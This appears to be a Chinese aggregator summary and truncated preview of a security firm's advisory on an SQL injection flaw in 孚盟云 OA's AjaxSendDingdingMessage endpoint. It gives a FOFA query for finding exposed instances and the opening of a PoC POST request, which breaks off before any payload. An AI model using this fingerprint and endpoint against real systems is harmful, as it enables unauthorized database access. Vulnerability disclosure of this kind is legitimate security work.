主要观点总结
本文是关于孚盟云oa中的ajaxsenddingdingmessage存在的sql注入漏洞的技术文章,提供了一些关于漏洞描述、复现步骤和公司简介等信息。
关键观点总结
关键观点1: 漏洞警告和授权问题
文章首先强调了融云安全的技术文章仅供参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,并且利用此文所提供的信息而造成的直接或间接后果和损失由使用者本人负责。
关键观点2: 漏洞详情
文章明确指出了孚盟云oa的ajaxsenddingdingmessage存在sql注入漏洞,这是文章的主要关注点。
关键观点3: 漏洞复现步骤
文章提供了如何利用fofa-query来复现这个漏洞的详细步骤,包括使用特定的POST请求和相关的HTTP头部信息。
关键观点4: 公司简介
文章最后介绍了江西渝融云安全科技有限公司的一些基本信息,包括其业务资质、荣誉和团队能力等。
文章预览
0x01 阅读须知 融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提 供的工具仅用于学习,禁止用于 其他! ! 0x02 漏洞描述 孚盟云oa ajaxsenddingdingmessage 存在sql注入漏洞。 0x03 漏洞复现 fofa-query: body="hidLicResult" & & body="hidProductID" 1.执行poc进行数据库版本查询,得到结果 POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1 Host : Accept-Encoding : gzip, deflate, br Accept-Language : zh-CN,zh;q=0.9 Connection : close Content-Type : application/x-www-form-urlencoded User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Versi
………………………………